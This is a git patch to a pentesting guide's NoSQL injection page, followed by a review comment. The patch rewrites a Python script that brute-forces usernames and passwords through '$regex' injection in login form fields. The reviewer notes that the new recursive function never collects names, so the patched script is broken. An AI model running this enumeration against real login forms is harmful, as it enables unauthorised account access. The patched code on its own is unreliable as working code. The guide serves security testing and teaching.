From 4b445305dacf6b3d0281ecbdebcc4c87f6cbe97c Mon Sep 17 00:00:00 2001
From: Christopher Pritchard
Date: Fri, 8 Dec 2023 20:56:03 +1300
Subject: [PATCH] Update nosql-injection.md with fixed brute force script

Fixed login brute force script so it doesn't just find one username per starting letter - this royally boned me and I don't want anyone else to feel the pain.

---
 pentesting-web/nosql-injection.md | 25 +++++++------------------
 1 file changed, 7 insertions(+), 18 deletions(-)

diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md
index 1c08a077d..b530470b1 100644
--- a/pentesting-web/nosql-injection.md
+++ b/pentesting-web/nosql-injection.md
@@ -237,31 +237,20 @@ def get_password(username):
 print("Found password "+password[1:].replace("\\", "")+" for username "+username)
 return password[1:].replace("\\", "")
-def get_usernames():
+def get_usernames(prefix):
 usernames = []
- params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
+ params = {"username[$regex]":"", "password[$regex]":".*"}
 for c in possible_chars:
- username = "^" + c
+ username = "^" + prefix + c
 params["username[$regex]"] = username + ".*"
 pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
 if int(pr.status_code) == 302:
- print("Found username starting with "+c)
- while True:
- for c2 in possible_chars:
- params["username[$regex]"] = username + c2 + ".*"
- if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
- username += c2
- print(username)
- break
-
- if c2 == possible_chars[-1]:
- print("Found username: "+username[1:])
- usernames.append(username[1:])
- break
+ print(username)
+ for user in get_usernames(prefix + c):
+ usernames.append(user)
 return usernames
-
-for u in get_usernames():
+for u in get_usernames(""):
 get_password(u)
 ```
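Review bot: The new `get_usernames` never appends a finished name, so every call returns an empty list and `for u in get_usernames(""): get_password(u)` does nothing: `usernames.append(user)` only forwards what the recursive call returns, and the recursion bottoms out at `return usernames` with the list still empty, so the names only ever appear in the `print(username)` progress output. The deleted version appended a name once no further character matched; restoring that here means tracking whether any `c` produced a 302 in the loop and, when none did and `prefix` is non-empty, doing `usernames.append(prefix)` before `return usernames`. The same hunk also drops `"login": "login"` from `params`, which the commit message does not mention; if the form relies on that field the requests may stop returning 302 at all, so the change deserves a word in the description if it is intentional. The hunk's trailing context may run past the end of this excerpt.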